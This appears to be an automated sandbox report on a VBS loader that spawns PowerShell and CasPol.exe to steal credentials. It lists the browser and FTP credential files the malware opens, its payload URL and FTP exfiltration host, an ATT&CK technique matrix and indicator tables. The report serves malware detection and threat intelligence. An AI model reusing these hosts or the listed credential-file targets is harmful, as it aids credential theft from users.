            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5484, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5484, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_010E4A7A bind,12_2_010E4A7A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_010E4A55 bind,12_2_010E4A55
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            1
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Exfiltration Over Alternative Protocol
            2
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts321
            Scripting
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            115
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth11
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts21
            Command and Scripting Interpreter
            Logon Script (Windows)12
            Process Injection
            321
            Scripting
            Security Account Manager321
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration1
            Non-Standard Port
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local Accounts1
            PowerShell
            Logon Script (Mac)Logon Script (Mac)2
            Obfuscated Files or Information
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer2
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets241
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size Limits23
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Masquerading
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items241
            Virtualization/Sandbox Evasion
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)12
            Process Injection
            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756154 Sample: SIEM_PO00938467648.vbs Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 35 ftp.mcmprint.net 2->35 37 qwedft.gq 2->37 39 2 other IPs or domains 2->39 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 10 other signatures 2->53 9 wscript.exe 1 1 2->9         started        signatures3 process4 signatures5 63 Wscript starts Powershell (via cmd or directly) 9->63 65 Obfuscated command line found 9->65 67 Very long command line found 9->67 12 powershell.exe 25 9->12         started        16 cmd.exe 1 9->16         started        process6 file7 33 C:\Users\user\AppData\...\0j5ctfzr.cmdline, Unicode 12->33 dropped 69 Tries to detect Any.run 12->69 18 CasPol.exe 15 12 12->18         started        22 csc.exe 3 12->22         started        25 conhost.exe 12->25         started        27 conhost.exe 16->27         started        signatures8 process9 dnsIp10 41 ftp.mcmprint.net 185.31.121.136, 21, 49858, 49859 RAX-ASBG Bulgaria 18->41 43 qwedft.gq 162.240.62.179, 49855, 80 UNIFIEDLAYER-AS-1US United States 18->43 45 api.ipify.org.herokudns.com 52.20.78.240, 443, 49857 AMAZON-AESUS United States 18->45 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->57 59 Tries to steal Mail credentials (via file / registry access) 18->59 61 4 other signatures 18->61 31 C:\Users\user\AppData\Local\...\0j5ctfzr.dll, PE32 22->31 dropped 29 cvtres.exe 1 22->29         started        file11 signatures12 process13

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SIEM_PO00938467648.vbs35%ReversingLabsScript-WScript.Trojan.GuLoader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll100%Joe Sandbox ML
            No Antivirus matches
            SourceDetectionScannerLabelLink
            api.ipify.org.herokudns.com0%VirustotalBrowse
            ftp.mcmprint.net10%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
            https://api.ipify.orgftp://ftp.mcmprint.netklogz0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://qwedft.gq/Akkant/VUUby127.xsn0%Avira URL Cloudsafe
            http://kmbImL.com0%Avira URL Cloudsafe
            https://contoso.com/License0%Avira URL Cloudsafe
            https://contoso.com/0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
            https://contoso.com/Icon0%Avira URL Cloudsafe
            https://ZK1g7ahAv5q7aIVR.comXy0%Avira URL Cloudsafe
            https://ZK1g7ahAv5q7aIVR.com0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org.herokudns.com
            52.20.78.240
            truefalseunknown
            qwedft.gq
            162.240.62.179
            truefalse
              unknown
              ftp.mcmprint.net
              185.31.121.136
              truetrueunknown
              api.ipify.org
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://api.ipify.org/false
                  high
                  http://qwedft.gq/Akkant/VUUby127.xsnfalse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://kmbImL.comCasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://127.0.0.1:HTTP/1.1CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://api.ipify.orgCasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://api.ipify.orgftp://ftp.mcmprint.netklogzCasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://contoso.com/powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Licensepowershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://ZK1g7ahAv5q7aIVR.comXyCasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ZK1g7ahAv5q7aIVR.comCasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.86807185996.000000001C701000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.91121875644.000000001D9FD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                162.240.62.179
                                qwedft.gqUnited States
                                46606UNIFIEDLAYER-AS-1USfalse
                                52.20.78.240
                                api.ipify.org.herokudns.comUnited States
                                14618AMAZON-AESUSfalse
                                185.31.121.136
                                ftp.mcmprint.netBulgaria
                                199364RAX-ASBGtrue
                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:756154
                                Start date and time:2022-11-29 18:31:34 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 15m 6s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:SIEM_PO00938467648.vbs
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:15
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 221
                                • Number of non-executed functions: 3
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 20.190.159.0, 20.190.159.73, 40.126.31.71, 20.190.159.71, 20.190.159.68, 20.190.159.75, 20.190.159.2, 40.126.31.73
                                • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, prda.aadg.msidentity.com, login.live.com, ctldl.windowsupdate.com, wdcp.microsoft.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                No simulations
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                162.240.62.179Ordine n.47201 pdf.vbsGet hashmaliciousBrowse
                                • qwedft.gq/Akkant/bwqPIdZhEA125.psm
                                Richiesta urgente.vbsGet hashmaliciousBrowse
                                • qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi
                                52.20.78.240SecuriteInfo.com.Win32.CrypterX-gen.10947.8437.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                hJ7aWr8Et2.exeGet hashmaliciousBrowse
                                • api.ipify.org/?format=exe
                                SecuriteInfo.com.Malicious_Behavior.SB.29614.19372.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                swift copy 016011 022.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                7wAieAv6gR.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                9zOTVIFu5T.exeGet hashmaliciousBrowse
                                • api.ipify.org/?format=txt
                                DtDo5rjAsP.exeGet hashmaliciousBrowse
                                • api.ipify.org/?format=xml
                                K24WHaP1Ki.exeGet hashmaliciousBrowse
                                • api.ipify.org/?format=xml
                                SecuriteInfo.com.HEUR.Trojan.Win32.Guloader.gen.29987.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                RIP_YOUR_PC_LOL.exeGet hashmaliciousBrowse
                                • api.ipify.org/?format=xml
                                DuThJ88QX1.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                47ee7c873ff6ad620d68f6bd92cbd41ae0194c446720228f805f3487192dd909.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                075BF8BFF27D626CA111B3CA9603F6C0D1E3C1D2F3ECD.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                yDqEvzDn2m.exeGet hashmaliciousBrowse
                                • api.ipify.org/?format=xml
                                iff.bin.dllGet hashmaliciousBrowse
                                • api.ipify.org/
                                0318_45657944978421.docGet hashmaliciousBrowse
                                • api.ipify.org/
                                SecuriteInfo.com.Heur.28256.docGet hashmaliciousBrowse
                                • api.ipify.org/
                                2HFJezUWHA.exeGet hashmaliciousBrowse
                                • api.ipify.org/?format=xml
                                QZLQkiS4nj.exeGet hashmaliciousBrowse
                                • api.ipify.org/?format=xml
                                SQCchgRsrh.docGet hashmaliciousBrowse
                                • api.ipify.org/
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                qwedft.gqOrdine n.47201 pdf.vbsGet hashmaliciousBrowse
                                • 162.240.62.179
                                Richiesta urgente.vbsGet hashmaliciousBrowse
                                • 162.240.62.179
                                api.ipify.org.herokudns.comSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SHIPMENT DOCUMENTS.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SecuriteInfo.com.Win32.CrypterX-gen.10947.8437.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                • 3.220.57.224
                                SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exeGet hashmaliciousBrowse
                                • 54.91.59.199
                                MEPS-42.exeGet hashmaliciousBrowse
                                • 3.232.242.170
                                ORDER.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                DHJ59300948.xlsGet hashmaliciousBrowse
                                • 3.232.242.170
                                Quotation.exeGet hashmaliciousBrowse
                                • 54.91.59.199
                                Cg7vRuVKhI.exeGet hashmaliciousBrowse
                                • 3.232.242.170
                                SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exeGet hashmaliciousBrowse
                                • 3.232.242.170
                                Wzf4gWTOC2.exeGet hashmaliciousBrowse
                                • 3.220.57.224
                                SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exeGet hashmaliciousBrowse
                                • 54.91.59.199
                                SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exeGet hashmaliciousBrowse
                                • 3.232.242.170
                                SecuriteInfo.com.Win32.PWSX-gen.25304.17510.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SecuriteInfo.com.BackDoor.SpyBotNET.25.24486.13932.exeGet hashmaliciousBrowse
                                • 54.91.59.199
                                buH9VrC1dQ.exeGet hashmaliciousBrowse
                                • 54.91.59.199
                                PO-08784 xlsx.vbeGet hashmaliciousBrowse
                                • 54.91.59.199
                                KWIR000714988.exeGet hashmaliciousBrowse
                                • 54.91.59.199
                                ftp.mcmprint.netPO-09784893 xlsx.vbsGet hashmaliciousBrowse
                                • 185.31.121.136
                                PO-08784 xlsx.vbeGet hashmaliciousBrowse
                                • 185.31.121.136
                                Ordine n.47201 pdf.vbsGet hashmaliciousBrowse
                                • 185.31.121.136
                                Richiesta urgente.vbsGet hashmaliciousBrowse
                                • 185.31.121.136
                                Payment advis pdf.scr.exeGet hashmaliciousBrowse
                                • 185.31.121.136
                                ordine C220205 pdf.exeGet hashmaliciousBrowse
                                • 185.31.121.136
                                PO#0192 xls.vbsGet hashmaliciousBrowse
                                • 185.31.121.136
                                ANGEBOTSANFRAGEN.exeGet hashmaliciousBrowse
                                • 185.31.121.136
                                SecuriteInfo.com.Trojan.NSIS.Agent.21226.9113.exeGet hashmaliciousBrowse
                                • 185.31.121.136
                                Jtkmmbl.exeGet hashmaliciousBrowse
                                • 185.31.121.80
                                DOC85945003805010 PDF.exeGet hashmaliciousBrowse
                                • 185.31.121.80
                                RFQ NO # 577131022.pif.exeGet hashmaliciousBrowse
                                • 185.31.121.80
                                PO-57064.scr.exeGet hashmaliciousBrowse
                                • 185.31.121.80
                                INQUIRY- EUSQ131302.scr.exeGet hashmaliciousBrowse
                                • 185.31.121.80
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                UNIFIEDLAYER-AS-1USRevised Policy Benefits.htmlGet hashmaliciousBrowse
                                • 192.185.196.49
                                Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                • 192.185.196.49
                                New_Financia1_Report.htmGet hashmaliciousBrowse
                                • 69.49.234.179
                                New_Financia1_Report.htmGet hashmaliciousBrowse
                                • 69.49.234.179
                                Policy handbook.htmlGet hashmaliciousBrowse
                                • 50.87.153.144
                                New PO-RJ-IN-003 - Knauf Queimados.exeGet hashmaliciousBrowse
                                • 192.185.90.105
                                SHIPPING DOC.exeGet hashmaliciousBrowse
                                • 50.87.139.143
                                Cg7vRuVKhI.exeGet hashmaliciousBrowse
                                • 108.167.141.123
                                policy handbooks.htmlGet hashmaliciousBrowse
                                • 50.87.153.144
                                https://u29751933.ct.sendgrid.net/ls/click?upn=CnGGOnFaxhvhWvH4Fu0DshuMMwznLhhSl0vF9VJfmXn4k3uWmXtWEXgU1gN1sOYDM-2FnTKBAYRDOo-2Fxp1e29eFw-3D-3D1SY9_-2FHydVa-2F6RgJ-2BO01uO1tSzf4k9wftL50WVzxI-2BDuM83WY91mlfH2j-2BdduOmIaC9RL57-2F4cZ8bwv5R6qDViDOPW8H7XI4v762lTVPjiQ2n2fiTT0EsPoTwZUC1VOPK6BOuruRTtU-2FIclxgJ3qp4zIBngkcg1uQEKF68oozcL-2BfK4GoB5e-2BnOh4XhI8nLZlju2lQTsa8dPRVDT7dRrjRlibaPNNXjuJ6PKaJjbMu-2Bzfm-2F8-3DGet hashmaliciousBrowse
                                • 50.87.144.212
                                http://nbtp3.commentlikeordislike.com/aHR0cHM6Ly9mb3Vyc3RhcmFsYW4uY29tL3N1Y2Nlc3MvZ28vZ2FicmllbGEubWFydGluQHNreWFpcmxpbmUuY29tGet hashmaliciousBrowse
                                • 69.49.229.176
                                SecuriteInfo.com.FileRepMalware.16929.9956.exeGet hashmaliciousBrowse
                                • 162.214.129.149
                                Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                • 192.185.196.49
                                Confirmation transfer Copy AGS # 22-0035.xlsGet hashmaliciousBrowse
                                • 69.49.245.57
                                PO-09784893 xlsx.vbsGet hashmaliciousBrowse
                                • 192.185.145.188
                                PO-08784 xlsx.vbeGet hashmaliciousBrowse
                                • 192.185.145.188
                                Confirmation transfer Copy AGS 22-0035.xlsGet hashmaliciousBrowse
                                • 69.49.245.57
                                Pago.xlsGet hashmaliciousBrowse
                                • 192.185.113.96
                                Ordine n.47201 pdf.vbsGet hashmaliciousBrowse
                                • 162.240.62.179
                                SHIPPING DOC.exeGet hashmaliciousBrowse
                                • 50.87.139.143
                                AMAZON-AESUSSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                http://url4483.sosadiazeventos.com/ls/click?upn=mXPGTXlLlQcgRVh-2F4Dp38fDRGJMmpWDEH-2FE76VgzzHi8nDM-2FDFm088Y0fZh2YEo3qbCf_fJCV5gLuaP5-2B7UCkl8vmUj8dC4C9Y4dg1tvjDkrKvY5UHarI7EGwbOBMpE-2F-2BTDbMTeAQqiCIplw1OEed2ml5geiDyCAjnFVFwD7rEXflsrU-2FDtPiBmvBUcn9oohKUiNRFALv-2B8n9tEJ8XP-2Bi8ehDveJ4shY6zR5k78j6VeP8An8lQFfJ6kmEWKqICZhGlO0fhkepKLO1yzpGTF9YmHbAGNDbmtf6HwQ7g1ug0zWgxA8-3DGet hashmaliciousBrowse
                                • 34.226.96.6
                                robinbot_sample2Get hashmaliciousBrowse
                                • 3.84.38.38
                                SHIPMENT DOCUMENTS.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fpostsign.web.app/r9s0h3lind07rhinda51arn0h3ldr9slarkd07r9s0h3nW1&c=92652Get hashmaliciousBrowse
                                • 54.204.125.248
                                robinbotGet hashmaliciousBrowse
                                • 34.229.40.203
                                robinbotGet hashmaliciousBrowse
                                • 34.229.40.203
                                SecuriteInfo.com.Win32.CrypterX-gen.10947.8437.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                http://xmas-art.ru/fo/ufmavtiwaehat-sejautfoja/haotwaep/376197/?T=44g47k0c-8q-1q1QZ44igflammatiojb&vfilclszdwwrqimq5-t-nsnba=contyasseursSZ6J2Get hashmaliciousBrowse
                                • 35.168.94.234
                                MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                • 3.220.57.224
                                SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exeGet hashmaliciousBrowse
                                • 54.91.59.199
                                MEPS-42.exeGet hashmaliciousBrowse
                                • 3.220.57.224
                                ORDER.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                DHJ59300948.xlsGet hashmaliciousBrowse
                                • 3.232.242.170
                                Quotation.exeGet hashmaliciousBrowse
                                • 3.220.57.224
                                Cg7vRuVKhI.exeGet hashmaliciousBrowse
                                • 3.232.242.170
                                SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exeGet hashmaliciousBrowse
                                • 3.232.242.170
                                Wzf4gWTOC2.exeGet hashmaliciousBrowse
                                • 3.220.57.224
                                SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exeGet hashmaliciousBrowse
                                • 54.91.59.199
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SHIPMENT DOCUMENTS.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                file.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SkyNet.1448.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SkyNet.1448.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                solicitud de presupuesto 29-11-2022.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                library.dllGet hashmaliciousBrowse
                                • 52.20.78.240
                                MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                MEPS-42.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                11-29-22.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                ORDER.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                Quotation.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                Ziraat-bankasiSwiftMessaji2911202245344.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                Cg7vRuVKhI.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                Wzf4gWTOC2.exeGet hashmaliciousBrowse
                                • 52.20.78.240
                                No context
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8003
                                Entropy (8bit):4.841989710132343
                                Encrypted:false
                                SSDEEP:192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
                                MD5:677C4E3A07935751EA3B092A5E23232F
                                SHA1:0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
                                SHA-256:D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
                                SHA-512:253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1049), with no line terminators
                                Category:dropped
                                Size (bytes):1052
                                Entropy (8bit):4.997907941877808
                                Encrypted:false
